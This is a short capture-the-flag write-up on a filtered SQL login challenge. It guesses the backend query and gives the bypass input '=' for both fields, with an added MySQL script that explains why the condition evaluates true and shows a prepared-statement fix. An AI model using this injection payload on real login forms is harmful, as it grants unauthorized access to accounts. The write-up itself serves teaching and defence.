How About Logging In? (登陆一下好吗) SQL

xiaoxiao, 2022-06-11

Address: http://ctf5.shiyanbar.com/web/wonderkun/web/index.html

References: https://blog.csdn.net/wy_97/article/details/75635661 https://blog.csdn.net/qq_35078631/article/details/54782596
Supplementary material: https://blog.csdn.net/LANVNAL/article/details/56965963

Analysis: the following are all filtered: * / select union or

Guessed backend query: $sql = "select user from flag where user='{$_POST['user']}' and password='{$_POST['password']}'";

With username: 1 and password: 1, this becomes

$sql ="select user from flag where user='1' and password='1' ";

The goal for now is to log in successfully, i.e. the SQL query must not raise an error.

Constructed input: username: '=' password: '='

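Result: $sql ="select user from flag where user='NULL'='NULL' and password='NULL'='NULL' "; [NULL here marks that the content between the single quotes is empty, i.e. the query actually reads user=''='' and password=''=''; the condition holds and no error is raised] [universal password]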
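The MySQL script below is an added example, not part of the original write-up: it evaluates the guessed query step by step to show why the condition holds, then runs the same input through a prepared statement, where it is compared as plain data. The row in flag and the names login, @u and @p are constructed for illustration, and the script assumes MySQL's implicit string-to-number conversion.

```sql
-- Constructed sample data; the real contents of the flag table are unknown.
CREATE TEMPORARY TABLE flag (user VARCHAR(32), password VARCHAR(32));
INSERT INTO flag VALUES ('admin', 'constructed-password');

-- 1. The query as the guessed backend builds it by string concatenation
--    when both fields contain the three characters '='.
SELECT user FROM flag WHERE user=''='' AND password=''='';

-- 2. The same WHERE clause taken apart. MySQL parses a=b=c as (a=b)=c:
--    step1 is the inner comparison, which yields the number 0 or 1;
--    step2 compares that number with '', and '' is converted to 0.
--    Every row whose user is not empty therefore satisfies the condition.
SELECT user,
       user=''          AS step1,
       (user='')=''     AS step2,
       password=''      AS step3,
       (password='')='' AS step4
FROM flag;

-- 3. Hardened form: placeholders keep the input out of the SQL grammar,
--    so the quotes and the equals sign are just characters in a value
--    that is compared against the stored user and password.
PREPARE login FROM 'SELECT user FROM flag WHERE user = ? AND password = ?';
SET @u = '''=''', @p = '''=''';   -- the literal three-character string '='
EXECUTE login USING @u, @p;
DEALLOCATE PREPARE login;

DROP TEMPORARY TABLE flag;
```

The keyword filter described in the analysis does not stop this input because it contains none of the filtered tokens; binding parameters removes the problem regardless of which characters are submitted.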

When reposting, please cite the original address: https://www.6miu.com/read-4931145.html
